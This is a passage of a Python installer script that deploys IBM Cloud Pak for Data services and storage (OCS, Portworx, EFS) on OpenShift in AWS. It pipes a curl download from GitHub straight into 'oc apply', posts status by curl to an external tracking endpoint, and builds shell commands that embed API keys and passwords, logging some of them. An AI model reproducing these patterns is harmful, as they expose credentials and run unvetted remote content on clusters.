oc_new_project ="oc new-project cpd-meta-ops"
try:
retcode = call(oc_new_project,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"Create meta ops project cpd-meta-ops,retcode=%s" %(retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.installOperator(icpdInstallLogFile)
oc_new_project ="oc new-project "+self.Namespace
try:
retcode = call(oc_new_project,shell=True, stdout=icpdInstallLogFile)
TR.info(methodName,"Create new project with user defined project name %s,retcode=%s" %(self.Namespace,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
#self.token = self.getToken(icpdInstallLogFile)
if(self.StorageType=='OCS'):
self.storageClass = "ocs-storagecluster-cephfs"
self.storageOverrideFile = "/ibm/override_ocs.yaml"
self.storageOverride = "ocs"
elif(self.StorageType=='Portworx'):
self.storageClass = "portworx-shared-gp3"
self.storageOverrideFile = "/ibm/override_px.yaml"
self.storageOverride = "portworx"
elif(self.StorageType=='EFS'):
self.storageClass = "aws-efs"
self.storageOverride = ""
litestart = Utilities.currentTimeMillis()
TR.info(methodName,"Start installing Lite package")
self.installAssemblies("lite",icpdInstallLogFile)
liteend = Utilities.currentTimeMillis()
self.printTime(litestart, liteend, "Installing Lite")
get_cpd_route_cmd = "oc get route -n "+self.Namespace+ " | grep '"+self.Namespace+"' | awk '{print $2}'"
TR.info(methodName, "Get CPD URL")
try:
self.cpdURL = check_output(['bash','-c', get_cpd_route_cmd])
TR.info(methodName, "CPD URL retrieved %s"%self.cpdURL)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.manageUser(icpdInstallLogFile)
if(self.installDV):
TR.info(methodName,"Start installing DV package")
dvstart = Utilities.currentTimeMillis()
self.installAssemblies("dv",icpdInstallLogFile)
dvend = Utilities.currentTimeMillis()
TR.info(methodName,"DV package installation completed")
self.printTime(dvstart, dvend, "Installing DV")
if(self.installWSL):
TR.info(methodName,"Start installing WSL package")
wslstart = Utilities.currentTimeMillis()
self.installAssemblies("wsl",icpdInstallLogFile)
wslend = Utilities.currentTimeMillis()
TR.info(methodName,"WSL package installation completed")
self.printTime(wslstart, wslend, "Installing WSL")
if(self.installWML):
TR.info(methodName,"Start installing WML package")
wmlstart = Utilities.currentTimeMillis()
self.installAssemblies("wml",icpdInstallLogFile)
wmlend = Utilities.currentTimeMillis()
TR.info(methodName,"WML package installation completed")
self.printTime(wmlstart, wmlend, "Installing WML")
if(self.installSpark):
TR.info(methodName,"Start installing Spark AE package")
sparkstart = Utilities.currentTimeMillis()
self.installAssemblies("spark",icpdInstallLogFile)
sparkend = Utilities.currentTimeMillis()
TR.info(methodName,"Spark AE package installation completed")
self.printTime(sparkstart, sparkend, "Installing Spark AE")
if(self.installWKC):
TR.info(methodName,"Start installing WKC package")
wkcstart = Utilities.currentTimeMillis()
self.installAssemblies("wkc",icpdInstallLogFile)
wkcend = Utilities.currentTimeMillis()
TR.info(methodName,"WKC package installation completed")
self.printTime(wkcstart, wkcend, "Installing WKC")
if(self.installOSWML):
TR.info(methodName,"Start installing AI Openscale package")
aiostart = Utilities.currentTimeMillis()
self.installAssemblies("aiopenscale",icpdInstallLogFile)
aioend = Utilities.currentTimeMillis()
TR.info(methodName,"AI Openscale package installation completed")
self.printTime(aiostart, aioend, "Installing AI Openscale")
if(self.installCDE):
TR.info(methodName,"Start installing Cognos Dashboard package")
cdestart = Utilities.currentTimeMillis()
self.installAssemblies("cde",icpdInstallLogFile)
cdeend = Utilities.currentTimeMillis()
TR.info(methodName,"Cognos Dashboard package installation completed")
self.printTime(cdestart, cdeend, "Installing Cognos Dashboard")
TR.info(methodName,"Installed all packages.")
#endDef
def installOperator(self,icpdInstallLogFile):
"""
method to install cpd operator
"""
methodName = "installOperator"
cloudctl_cmd = 'cloudctl-linux-amd64 case launch --case ibm-cp-datacore --namespace cpd-meta-ops --inventory cpdMetaOperatorSetup --action install-operator --tolerance=1 --args "--entitledRegistry cp.icr.io/cp/cpd --entitledUser cp --entitledPass '+self.apiKey+'"'
try:
TR.info(methodName,"Execute install operator %s"%cloudctl_cmd)
retcode = check_output(['bash','-c',cloudctl_cmd])
TR.info(methodName,"Install operator returned %s"%retcode)
time.sleep(300)
cloudctl_status_cmd = "oc get pods -n cpd-meta-ops -l name=ibm-cp-data-operator --no-headers | awk '{print $3}'"
retcode = check_output(['bash','-c',cloudctl_status_cmd])
TR.info(methodName,"Execute install operator returned %s"%(retcode))
if("Running" not in retcode):
TR.error(methodName,"Installation of operator Failed %s"%retcode)
raise Exception("Installation of operator Failed: %s" % retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
#endDef
def printTime(self, beginTime, endTime, text):
"""
method to capture time elapsed for each event during installation
"""
methodName = "printTime"
elapsedTime = (endTime - beginTime)/1000
etm, ets = divmod(elapsedTime,60)
eth, etm = divmod(etm,60)
TR.info(methodName,"Elapsed time (hh:mm:ss): %d:%02d:%02d for %s" % (eth,etm,ets,text))
#endDef
def updateTemplateFile(self, source, placeHolder, value):
"""
method to update placeholder values in templates
"""
source_file = open(source).read()
source_file = source_file.replace(placeHolder, value)
updated_file = open(source, 'w')
updated_file.write(source_file)
updated_file.close()
#endDef
def readFileContent(self,source):
file = open(source,mode='r')
content = file.read()
file.close()
return content.rstrip()
def installAssemblies(self, assembly, icpdInstallLogFile):
"""
method to install assemlies
for each assembly this method will execute adm command to apply all prerequistes
Images will be pushed to local registry
Installation will be done for the assembly using local registry
"""
methodName = "installAssemblies"
service_tmpl = "/ibm/installDir/cpd-service.tpl.yaml"
service_cr = "/ibm/installDir/cpd-"+assembly+".yaml"
shutil.copyfile(service_tmpl,service_cr)
self.updateTemplateFile(service_cr,'${SERVICE}',assembly)
self.updateTemplateFile(service_cr,'${STORAGECLASS}',self.storageClass)
self.updateTemplateFile(service_cr,'${override-storage}', self.storageOverride)
install_cmd = "oc create -f "+service_cr
try:
TR.info(methodName,"Execute install command for assembly %s"%assembly)
retcode = call(install_cmd,shell=True, stdout=icpdInstallLogFile)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName,"Execute install command for assembly %s returned %s"%(assembly,retcode))
cr_status_cmd = "oc get cpdservice "+assembly+"-cpdservice --output='jsonpath={.status.status}' | xargs"
try:
retcode = "Installing"
while(retcode.rstrip()!="Ready"):
time.sleep(60)
retcode = check_output(['bash','-c',cr_status_cmd])
TR.info(methodName,"Get install status for assembly %s is %s"%(assembly,retcode))
if(retcode.rstrip() == "Failed"):
TR.error(methodName,"Installation of assembly %s Failed"%assembly)
raise Exception("Installation of assembly %s Failed"%assembly)
TR.info(methodName,"Get install status for assembly %s is %s"%(assembly,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
def getS3Object(self, bucket=None, s3Path=None, destPath=None):
"""
Return destPath which is the local file path provided as the destination of the download.
A pre-signed URL is created and used to download the object from the given S3 bucket
with the given S3 key (s3Path) to the given local file system destination (destPath).
The destination path is assumed to be a full path to the target destination for
the object.
If the directory of the destPath does not exist it is created.
It is assumed the objects to be gotten are large binary objects.
For details on how to download a large file with the requests package see:
https://stackoverflow.com/questions/16694907/how-to-download-large-file-in-python-with-requests-py
"""
methodName = "getS3Object"
if (not bucket):
raise MissingArgumentException("An S3 bucket name (bucket) must be provided.")
#endIf
if (not s3Path):
raise MissingArgumentException("An S3 object key (s3Path) must be provided.")
#endIf
if (not destPath):
raise MissingArgumentException("A file destination path (destPath) must be provided.")
#endIf
TR.info(methodName, "STARTED download of object: %s from bucket: %s, to: %s" % (s3Path,bucket,destPath))
s3url = self.s3.generate_presigned_url(ClientMethod='get_object',Params={'Bucket': bucket, 'Key': s3Path},ExpiresIn=60)
TR.fine(methodName,"Getting S3 object with pre-signed URL: %s" % s3url)
#endIf
destDir = os.path.dirname(destPath)
if (not os.path.exists(destDir)):
os.makedirs(destDir)
TR.info(methodName,"Created object destination directory: %s" % destDir)
#endIf
r = requests.get(s3url, stream=True)
with open(destPath, 'wb') as destFile:
shutil.copyfileobj(r.raw, destFile)
#endWith
TR.info(methodName, "COMPLETED download from bucket: %s, object: %s, to: %s" % (bucket,s3Path,destPath))
return destPath
#endDef
def manageUser(self, icpdInstallLogFile):
"""
method to update the default password of admin user of CPD with user defined password
Note: CPD password will be same as Openshift Cluster password
"""
methodName = "manageUser"
bash_cmd = 'printf \"'+self.password+'\n" | /usr/src/server-src/scripts/manage-user.sh --enable-user admin'
manageUser="oc -n "+self.Namespace+" exec -it $(oc get pod -n "+self.Namespace+" -l component=usermgmt | tail -1 | cut -f1 -d\ ) -- bash -c '"+bash_cmd+"'"
TR.info(methodName,"Start manageUser")
try:
retcode = check_output(['bash','-c', manageUser])
TR.info(methodName,"End manageUser returned %s"%(retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
def updateStatus(self, status):
methodName = "updateStatus"
TR.info(methodName," Update Status of installation")
data = "352_AWS_STACK,Status="+status
updateStatus = "curl -X POST https://un6laaf4v0.execute-api.us-west-2.amazonaws.com/testtracker --data "+data
try:
call(updateStatus, shell=True)
TR.info(methodName,"Updated status with data %s"%data)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
#endDef
def configureEFS(self):
"""
Configure an EFS volume and configure all worker nodes to be able to use
the EFS storage provisioner.
"""
methodName = "configureEFS"
TR.info(methodName,"STARTED configuration of EFS")
# Create the EFS provisioner service account
"""
oc create -f efs-configmap.yaml -n default
oc create serviceaccount efs-provisioner
oc create -f efs-rbac-template.yaml
oc create -f efs-storageclass.yaml
oc create -f efs-provisioner.yaml
oc create -f efs-pvc.yaml
"""
# self.updateTemplateFile(workerocs,'${az1}', self.zones[0])
self.updateTemplateFile("/ibm/templates/efs/efs-configmap.yaml",'${file-system-id}',self.EFSID)
self.updateTemplateFile("/ibm/templates/efs/efs-configmap.yaml",'${aws-region}',self.region)
self.updateTemplateFile("/ibm/templates/efs/efs-configmap.yaml",'${efsdnsname}',self.EFSDNSName)
self.updateTemplateFile("/ibm/templates/efs/efs-provisioner.yaml",'${file-system-id}',self.EFSID)
self.updateTemplateFile("/ibm/templates/efs/efs-provisioner.yaml",'${aws-region}',self.region)
TR.info(methodName,"Invoking: oc create -f efs-configmap.yaml -n default")
cm_cmd = "oc create -f /ibm/templates/efs/efs-configmap.yaml -n default"
retcode = call(cm_cmd, shell=True)
if (retcode != 0):
TR.info(methodName,"Invoking: oc create -f efs-configmap.yaml -n default %s" %retcode)
raise Exception("Error calling oc. Return code: %s" % retcode)
#endIf
TR.info(methodName,"Invoking: oc create serviceaccount efs-provisioner")
sa_cmd = "oc create serviceaccount efs-provisioner"
retcode = call(sa_cmd, shell=True)
if (retcode != 0):
raise Exception("Error calling oc. Return code: %s" % retcode)
#endIf
TR.info(methodName,"Invoking: oc create -f efs-rbac-template.yaml")
rbac_cmd = "oc create -f /ibm/templates/efs/efs-rbac-template.yaml"
retcode = call(rbac_cmd, shell=True)
if (retcode != 0):
raise Exception("Error calling oc. Return code: %s" % retcode)
#endIf
TR.info(methodName,"Invoking: oc create -f efs-storageclass.yaml")
sc_cmd = "oc create -f /ibm/templates/efs/efs-storageclass.yaml"
retcode = call(sc_cmd, shell=True)
if (retcode != 0):
raise Exception("Error calling oc. Return code: %s" % retcode)
#endIf
TR.info(methodName,"Invoking: oc create -f efs-provisioner.yaml")
prov_cmd = "oc create -f /ibm/templates/efs/efs-provisioner.yaml"
retcode = call(prov_cmd, shell=True)
if (retcode != 0):
raise Exception("Error calling oc. Return code: %s" % retcode)
#endIf
TR.info(methodName,"Invoking: oc create -f efs-pvc.yaml")
pvc_cmd = "oc create -f /ibm/templates/efs/efs-pvc.yaml"
retcode = call(pvc_cmd, shell=True)
if (retcode != 0):
raise Exception("Error calling oc. Return code: %s" % retcode)
#endIf
TR.info(methodName,"COMPLETED configuration of EFS.")
#endDef
def configureOCS(self,icpdInstallLogFile):
"""
This method reads user preferences from stack parameters and configures OCS as storage classs accordingly.
Depending on 1 or 3 AZ appropriate template file is used to create machinesets.
"""
methodName = "configureOCS"
TR.info(methodName," Start configuration of OCS for CPD")
workerocs = "/ibm/templates/ocs/workerocs.yaml"
workerocs_1az = "/ibm/templates/ocs/workerocs1AZ.yaml"
if(len(self.zones)==1):
shutil.copyfile(workerocs_1az,workerocs)
self.updateTemplateFile(workerocs,'${az1}', self.zones[0])
self.updateTemplateFile(workerocs,'${ami_id}', self.amiID)
self.updateTemplateFile(workerocs,'${instance-type}', self.OCSInstanceType)
self.updateTemplateFile(workerocs,'${instance-count}', self.NumberOfOCS)
self.updateTemplateFile(workerocs,'${region}', self.region)
self.updateTemplateFile(workerocs,'${cluster-name}', self.ClusterName)
self.updateTemplateFile(workerocs, 'CLUSTERID', self.clusterID)
self.updateTemplateFile(workerocs,'${subnet-1}',self.PrivateSubnet1ID)
if(len(self.zones)>1):
self.updateTemplateFile(workerocs,'${az2}', self.zones[1])
self.updateTemplateFile(workerocs,'${az3}', self.zones[2])
self.updateTemplateFile(workerocs,'${subnet-2}',self.PrivateSubnet2ID)
self.updateTemplateFile(workerocs,'${subnet-3}',self.PrivateSubnet3ID)
create_ocs_nodes_cmd = "oc create -f "+workerocs
TR.info(methodName,"Create OCS nodes")
try:
retcode = check_output(['bash','-c', create_ocs_nodes_cmd])
time.sleep(600)
TR.info(methodName,"Created OCS nodes %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
ocs_nodes = []
get_ocs_nodes = "oc get nodes --show-labels | grep storage-node |cut -d' ' -f1 "
try:
ocs_nodes = check_output(['bash','-c',get_ocs_nodes])
nodes = ocs_nodes.split("\n")
TR.info(methodName,"OCS_NODES %s"%nodes)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
i =0
while i < len(nodes)-1:
TR.info(methodName,"Labeling for OCS node %s " %nodes[i])
label_cmd = "oc label nodes "+nodes[i]+" cluster.ocs.openshift.io/openshift-storage=''"
try:
retcode = check_output(['bash','-c', label_cmd])
TR.info(methodName,"Label for OCS node %s returned %s" %(nodes[i],retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
i += 1
deploy_olm_cmd = "oc create -f /ibm/templates/ocs/deploy-with-olm.yaml"
TR.info(methodName,"Deploy OLM")
try:
retcode = check_output(['bash','-c', deploy_olm_cmd])
time.sleep(300)
TR.info(methodName,"Deployed OLM %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
create_storage_cluster_cmd = "oc create -f /ibm/templates/ocs/ocs-storagecluster.yaml"
TR.info(methodName,"Create Storage Cluster")
try:
retcode = check_output(['bash','-c', create_storage_cluster_cmd])
time.sleep(600)
TR.info(methodName,"Created Storage Cluster %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
install_ceph_tool_cmd = "curl -s https://raw.githubusercontent.com/rook/rook/release-1.1/cluster/examples/kubernetes/ceph/toolbox.yaml|sed 's/namespace: rook-ceph/namespace: openshift-storage/g'| oc apply -f -"
TR.info(methodName,"Install ceph toolkit")
try:
retcode = check_output(['bash','-c', install_ceph_tool_cmd])
TR.info(methodName,"Installed ceph toolkit %s" %retcode)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName,"Configuration of OCS for CPD completed")
#endDef
def preparePXInstall(self,icpdInstallLogFile):
"""
This method does all required background work like creating policy required to spin up EBS volumes, updating security group with portworx specific ports.
"""
methodName = "preparePXInstall"
TR.info(methodName,"Pre requisite for Portworx Installation")
"""
#INST_PROFILE_NAME=`aws ec2 describe-instances --query 'Reservations[*].Instances[*].[IamInstanceProfile.Arn]' --output text | cut -d ':' -f 6 | cut -d '/' -f 2 | grep worker* | uniq`
"""
TR.info(methodName,"Get INST_PROFILE_NAME")
tag_value = self.clusterID+"-worker*"
TR.info(methodName,"Tag value of worker to look for %s"%tag_value)
response = self.ec2.describe_instances(Filters=[{'Name': 'tag:Name','Values': [tag_value]}])
TR.info(methodName,"response %s"%response)
reservation = response['Reservations']
TR.info(methodName,"reservation %s"%reservation)
for item in reservation:
instances = item['Instances']
TR.info(methodName,"instances %s"%instances)
for instance in instances:
if 'IamInstanceProfile' in instance:
instanceProfile = instance['IamInstanceProfile']['Arn'].split("/")[1]
TR.info(methodName,"instanceProfile %s"%instanceProfile)
TR.info(methodName,"Instance profile retrieved %s"%instanceProfile)
#ROLE_NAME=`aws iam get-instance-profile --instance-profile-name $INST_PROFILE_NAME --query 'InstanceProfile.Roles[*].[RoleName]' --output text`
TR.info(methodName,"Get Role name")
iamresponse = self.iam.get_instance_profile(InstanceProfileName=instanceProfile)
rolename = iamresponse['InstanceProfile']['Roles'][0]['RoleName']
TR.info(methodName,"Role name retrieved %s"%rolename)
#POLICY_ARN=`aws iam create-policy --policy-name portworx-policy-${VAR} --policy-document file://policy.json --query 'Policy.Arn' --output text`
policycontent = {'Version': '2012-10-17', 'Statement': [{'Action': ['ec2:AttachVolume', 'ec2:ModifyVolume', 'ec2:DetachVolume', 'ec2:CreateTags', 'ec2:CreateVolume', 'ec2:DeleteTags', 'ec2:DeleteVolume', 'ec2:DescribeTags', 'ec2:DescribeVolumeAttribute', 'ec2:DescribeVolumesModifications', 'ec2:DescribeVolumeStatus', 'ec2:DescribeVolumes', 'ec2:DescribeInstances'], 'Resource': ['*'], 'Effect': 'Allow'}]}
TR.info(methodName,"Get policy_arn")
policyName = "portworx-policy-"+self.ClusterName
policy = self.iam.create_policy(PolicyName=policyName,PolicyDocument=json.dumps(policycontent))
policy_arn = policy['Policy']['Arn']
destroy_sh = "/ibm/destroy.sh"
self.updateTemplateFile(destroy_sh,'$ROLE_NAME',rolename)
self.updateTemplateFile(destroy_sh,'$POLICY_ARN',policy_arn)
TR.info(methodName,"Policy_arn retrieved %s"%policy_arn)
# aws iam attach-role-policy --role-name $ROLE_NAME --policy-arn $POLICY_ARN
TR.info(methodName,"Attach IAM policy")
response = self.iam.attach_role_policy(RoleName=rolename,PolicyArn=policy_arn)
TR.info(methodName,"Attached role policy returned %s"%response)
"""
WORKER_TAG=`aws ec2 describe-security-groups --query 'SecurityGroups[*].Tags[*][Value]' --output text | grep worker`
MASTER_TAG=`aws ec2 describe-security-groups --query 'SecurityGroups[*].Tags[*][Value]' --output text | grep master`
WORKER_GROUP_ID=`aws ec2 describe-security-groups --filters Name=tag:Name,Values=$WORKER_TAG --query "SecurityGroups[*].{Name:GroupId}" --output text`
MASTER_GROUP_ID=`aws ec2 describe-security-groups --filters Name=tag:Name,Values=$MASTER_TAG --query "SecurityGroups[*].{Name:GroupId}" --output text`
"""
TR.info(methodName,"Retrieve tags and group id from security groups")
ret = self.ec2.describe_security_groups()
worker_sg_value = self.clusterID+"-worker-sg"
master_sg_value = self.clusterID+"-master-sg"
sec_groups = ret['SecurityGroups']
for sg in sec_groups:
if 'Tags' in sg:
tags = sg['Tags']
for tag in tags:
if worker_sg_value in tag['Value']:
worker_tag = tag['Value']
elif master_sg_value in tag['Value']:
master_tag = tag['Value']
worker_group = self.ec2.describe_security_groups(Filters=[{'Name':'tag:Name','Values':[worker_tag]}])
sec_groups = worker_group['SecurityGroups']
for sg in sec_groups:
worker_group_id = sg['GroupId']
master_group = self.ec2.describe_security_groups(Filters=[{'Name':'tag:Name','Values':[master_tag]}])
sec_groups = master_group['SecurityGroups']
for sg in sec_groups:
master_group_id = sg['GroupId']
TR.info(methodName,"Retrieved worker tag %s master tag %s and worker group id %s master group id %s from security groups"%(worker_tag,master_tag,worker_group_id,master_group_id))
"""
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 17001-17020 --source-group $MASTER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 17001-17020 --source-group $WORKER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 111 --source-group $MASTER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 111 --source-group $WORKER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 2049 --source-group $MASTER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 2049 --source-group $WORKER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 20048 --source-group $MASTER_GROUP_ID
aws ec2 authorize-security-group-ingress --group-id $WORKER_GROUP_ID --protocol tcp --port 20048 --source-group $WORKER_GROUP_ID
"""
TR.info(methodName,"Start authorize-security-group-ingress")
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':17001,'ToPort':17020,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':17001,'ToPort':17020,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':111,'ToPort':111,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':111,'ToPort':111,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':2049,'ToPort':2049,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':2049,'ToPort':2049,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':20048,'ToPort':20048,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':20048,'ToPort':20048,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':9001,'ToPort':9022,'UserIdGroupPairs':[{'GroupId':worker_group_id}]}])
self.ec2.authorize_security_group_ingress(GroupId=worker_group_id,IpPermissions=[{'IpProtocol':'tcp','FromPort':9001,'ToPort':9022,'UserIdGroupPairs':[{'GroupId':master_group_id}]}])
TR.info(methodName,"End authorize-security-group-ingress")
TR.info(methodName,"Done Pre requisite for Portworx Installation")
#endDef
def updateScc(self,icpdInstallLogFile):
"""
This method is used to update the SCC required for portworx installation.
"""
methodName = "updateScc"
TR.info(methodName,"Start Updating SCC for Portworx Installation")
"""
oc adm policy add-scc-to-user privileged system:serviceaccount:kube-system:px-account
oc adm policy add-scc-to-user privileged system:serviceaccount:kube-system:portworx-pvc-controller-account
oc adm policy add-scc-to-user privileged system:serviceaccount:kube-system:px-lh-account
oc adm policy add-scc-to-user anyuid system:serviceaccount:kube-system:px-lh-account
oc adm policy add-scc-to-user anyuid system:serviceaccount:default:default
oc adm policy add-scc-to-user privileged system:serviceaccount:kube-system:px-csi-account
"""
list = ["px-account","portworx-pvc-controller-account","px-lh-account","px-csi-account"]
oc_adm_cmd = "oc adm policy add-scc-to-user privileged system:serviceaccount:kube-system:"
for scc in list:
cmd = oc_adm_cmd+scc
TR.info(methodName,"Run get_nodes command %s"%cmd)
try:
retcode = check_output(['bash','-c', cmd])
TR.info(methodName,"Completed %s command with return value %s" %(cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
cmd = "oc adm policy add-scc-to-user anyuid system:serviceaccount:default:default"
try:
retcode = check_output(['bash','-c', cmd])
TR.info(methodName,"Completed %s command with return value %s" %(cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
cmd = "oc adm policy add-scc-to-user anyuid system:serviceaccount:kube-system:px-lh-account"
try:
retcode = check_output(['bash','-c', cmd])
TR.info(methodName,"Completed %s command with return value %s" %(cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
TR.info(methodName,"Done Updating SCC for Portworx Installation")
#endDef
def labelNodes(self,icpdInstallLogFile):
methodName = "labelNodes"
TR.info(methodName," Start Label nodes for Portworx Installation")
"""
WORKER_NODES=`oc get nodes | grep worker | awk '{print $1}'`
for wnode in ${WORKER_NODES[@]}; do
oc label nodes $wnode node-role.kubernetes.io/compute=true
done
"""
get_nodes = "oc get nodes | grep worker | awk '{print $1}'"
TR.info(methodName,"Run get_nodes command %s"%get_nodes)
try:
worker_nodes = check_output(['bash','-c', get_nodes])
TR.info(methodName,"Completed %s command with return value %s" %(get_nodes,worker_nodes))
nodes = worker_nodes.split("\n")
TR.info(methodName,"worker nodes %s"%nodes)
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
i =0
while i < len(nodes)-1:
TR.info(methodName,"Labeling for worker node %s " %nodes[i])
label_cmd = "oc label nodes "+nodes[i]+" node-role.kubernetes.io/compute=true"
try:
retcode = check_output(['bash','-c', label_cmd])
TR.info(methodName,"Label for Worker node %s returned %s" %(nodes[i],retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
i += 1
TR.info(methodName,"Done Label nodes for Portworx Installation")
#endDef
def setpxVolumePermission(self,icpdInstallLogFile):
"""
This method sets delete of termination permission to the volumes created by portworx on the worker nodes.
"""
methodName = "setpxVolumePermission"
TR.info(methodName,"Start setpxVolumePermission")
"""
WORKER_INSTANCE_ID=`aws ec2 describe-instances --filters 'Name=tag:Name,Values=*worker*' --output text --query 'Reservations[*].Instances[*].InstanceId'`
DEVICE_NAME=`aws ec2 describe-instances --filters 'Name=tag:Name,Values=*worker*' --output text --query 'Reservations[*].Instances[*].BlockDeviceMappings[*].DeviceName' | uniq`
for winstance in ${WORKER_INSTANCE_ID[@]}; do
for device in ${DEVICE_NAME[@]}; do
aws ec2 modify-instance-attribute --instance-id $winstance --block-device-mappings "[{\"DeviceName\": \"$device\",\"Ebs\":{\"DeleteOnTermination\":true}}]"
done
done
"""
tag_value=self.clusterID+"-worker*"
response = self.ec2.describe_instances(Filters=[{'Name': 'tag:Name','Values': [tag_value,]}])
reservation = response['Reservations']
for item in reservation:
instances = item['Instances']
for instance in instances:
deviceMappings = instance['BlockDeviceMappings']
for device in deviceMappings:
resp = self.ec2.modify_instance_attribute(InstanceId=instance['InstanceId'],BlockDeviceMappings=[{'DeviceName': device['DeviceName'],'Ebs': {'DeleteOnTermination': True}}])
TR.info(methodName,"Modified instance attribute for instance %s device name %s returned %s"%(instance['InstanceId'],device['DeviceName'],resp))
#endFor
#endFor
#endFor
TR.info(methodName,"Completed setpxVolumePermission")
#endDef
def configurePx(self, icpdInstallLogFile):
methodName = "configurePx"
TR.info(methodName," Start configuration of Portworx for CPD")
default_route = "oc get route default-route -n openshift-image-registry --template='{{ .spec.host }}'"
TR.info(methodName,"Get default route %s"%default_route)
try:
self.ocr = check_output(['bash','-c', default_route])
TR.info(methodName,"Completed %s command with return value %s" %(default_route,self.ocr))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
create_secret_cmd = "oc create secret docker-registry regcred --docker-server="+self.ocr+" --docker-username=kubeadmin --docker-password="+self.ocpassword+" -n kube-system"
TR.info(methodName,"Create OC secret for PX installation %s"%create_secret_cmd)
try:
retcode = check_output(['bash','-c', create_secret_cmd])
TR.info(methodName,"Completed %s command with return value %s" %(create_secret_cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
self.preparePXInstall(icpdInstallLogFile)
time.sleep(30)
self.updateScc(icpdInstallLogFile)
time.sleep(30)
self.labelNodes(icpdInstallLogFile)
time.sleep(30)
label_cmd = "oc get nodes --show-labels | grep 'node-role.kubernetes.io/compute=true'"
TR.info(methodName,"Run label_cmd command %s"%label_cmd)
try:
retcode = check_output(['bash','-c', label_cmd])
TR.info(methodName,"Completed %s command with return value %s" %(label_cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
time.sleep(30)
px_install_cmd = "oc apply -f /ibm/templates/px/px-install.yaml"
TR.info(methodName,"Run px-install command %s"%px_install_cmd)
try:
retcode = check_output(['bash','-c', px_install_cmd])
TR.info(methodName,"Completed %s command with return value %s" %(px_install_cmd,retcode))
except CalledProcessError as e:
TR.error(methodName,"command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
time.sleep(180)
px_spec_cmd = "oc create -f /ibm/templates/px/px-spec.yaml"
